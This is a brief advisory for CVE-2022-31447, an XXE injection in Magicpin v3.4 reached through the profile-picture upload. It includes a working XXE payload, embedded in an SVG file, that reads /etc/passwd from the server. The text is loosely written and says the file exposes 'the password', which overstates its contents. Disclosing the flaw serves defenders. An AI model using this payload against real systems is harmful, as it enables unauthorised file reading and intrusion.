Headline
CVE-2022-31447: XXE injection in Magicpin 3.4
An XML external entity (XXE) injection vulnerability in Magicpin v3.4 allows attackers to access sensitive database information via a crafted SVG file.
Visit the login page and upload details while uploading the progile picture upload the SVG file which has the payload as folloing
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
this will fetch the password from the machine further exploiting the issue allow an intruder to access the database